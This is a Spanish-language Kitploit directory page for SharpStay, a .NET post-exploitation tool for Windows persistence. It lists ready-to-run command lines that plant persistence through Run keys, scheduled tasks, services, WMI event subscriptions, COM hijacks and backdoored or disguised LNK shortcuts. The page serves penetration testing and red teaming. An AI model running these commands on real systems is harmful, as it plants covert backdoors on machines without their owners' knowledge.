Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SharpStay — Herramienta .NET para instalar persistencia en Windows mediante claves de registro, tareas programadas, servicios, eventos WMI, secuestros COM y puertas traseras LNK, compatible con contextos elevados y no elevados. | Kitploit
Herramientas/GitHubGitHub/0xthirteen/sharpstay
Mecanismos de PersistenciaPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHub0xthirteen/sharpstay

SharpStay

Herramienta .NET para instalar persistencia en Windows mediante claves de registro, tareas programadas, servicios, eventos WMI, secuestros COM y puertas traseras LNK, compatible con contextos elevados y no elevados.

Ver Repositorio
498100hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SharpStay - Persistencia .NET

Compilación

Para compilar, abre el proyecto de Visual Studio y compila para release.

Opciones

  • Claves de Registro Elevadas

  • Clave de Registro UserInit Elevada

  • Tarea Programada Elevada

  • Crear Servicio Elevado

  • Suscripción a Evento WMI Elevada

  • Clave de Registro InitMprLogonScript No Elevada

  • Secuestro de Controlador COM de Tarea Programada No Elevado

  • Carpeta de Unión No Elevada

  • Misc Agregar Acción de Tarea Programada

  • Misc Directorio de Inicio

  • Misc Nuevo LNK

  • Misc LNK Puerta Trasera

  • Misc Nombres de Tareas

  • Misc Listar Tareas Programadas

  • Misc Listar Servicios en Ejecución

  • Misc Obtener Controladores COM de Tareas Programadas

root@kitploit:~
Sharpstay.exe action=ElevatedRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=UserRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=UserInitMprLogonScriptKey command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=ElevatedUserInitKey command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=ScheduledTask taskname=TestTask command="C:\windows\temp\file.exe" runasuser=user1 triggertype=logon author=Microsoft Corp. description="Test Task" logonuser=user1
root@kitploit:~
Sharpstay.exe action=ScheduledTaskAction taskname=TestTask command="C:\Windows\temp\fun.exe" folder="\\" actionid=ExecAction
root@kitploit:~
Sharpstay.exe action=SchTaskCOMHijack clsid={a47af52a-27f9-4426-bd2b-727050712db1} dllpath="C:\windows\temp\fun.dll"
root@kitploit:~
Sharpstay.exe action=CreateService servicename=TestService command="C:\Windows\temp\fun.exe"
root@kitploit:~
Sharpstay.exe action=WMIEventSub command="C:\Windows\temp\fun.exe" eventname=Debugger attime=startup 
root@kitploit:~
Sharpstay.exe action=JunctionFolder dllpath="C:\windows\temp\fun.dll guid={a47af52a-27f9-4426-bd2b-727050712db1}
root@kitploit:~
Sharpstay.exe action=NewLNK filepath="C:\users\admin\desktop" lnkname="Notepad.lnk" lnktarget="C:\Windows\temp\file.exe" lnkicon="C:\Windows\system32\notepad.exe"
root@kitploit:~
Sharpstay.exe action=BackdoorLNK command="C:\Windows\temp\fun.exe" lnkpath="C:\users\user\desktop\Excel.lnk"
root@kitploit:~
Sharpstay.exe action=ListTaskNames
root@kitploit:~
Sharpstay.exe action=ListScheduledTasks
root@kitploit:~
Sharpstay.exe action=ListRunningServices
root@kitploit:~
Sharpstay.exe action=GetScheduledTaskCOMHandler

cleanup=true es una opción para cada tipo de persistencia.

Parte de StayKit

Descargar herramienta